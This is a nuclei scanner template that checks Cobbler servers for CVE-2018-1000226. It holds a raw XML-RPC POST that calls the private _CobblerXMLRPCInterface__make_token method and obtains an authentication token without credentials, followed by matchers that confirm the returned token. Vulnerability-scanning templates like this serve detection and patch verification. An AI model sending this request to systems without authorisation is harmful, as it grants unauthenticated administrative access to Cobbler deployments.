nuclei-templates/cves/2018/CVE-2018-1000226.yaml

61 lines
1.4 KiB
YAML

id: CVE-2018-1000226
info:
name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass
author: c-sh0
severity: critical
reference:
- https://github.com/cobbler/cobbler/issues/1916
- https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-1000226
cwe-id: CWE-732
tags: cve,cve2018,cobbler,auth-bypass
requests:
- raw:
- |
POST {{BaseURL}}/cobbler_api HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version='1.0'?>
<methodCall>
<methodName>_CobblerXMLRPCInterface__make_token</methodName>
<params>
<param>
<value>
<string>cobbler</string>
</value>
</param>
</params>
</methodCall>
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "Content-Type: text/xml"
- type: word
part: body
words:
- "<methodResponse>"
- type: dsl
dsl:
- "!contains(tolower(body), '<name>faultCode</name>')"
- type: regex
part: body
regex:
- "(.*[a-zA-Z0-9].+==)</string></value>"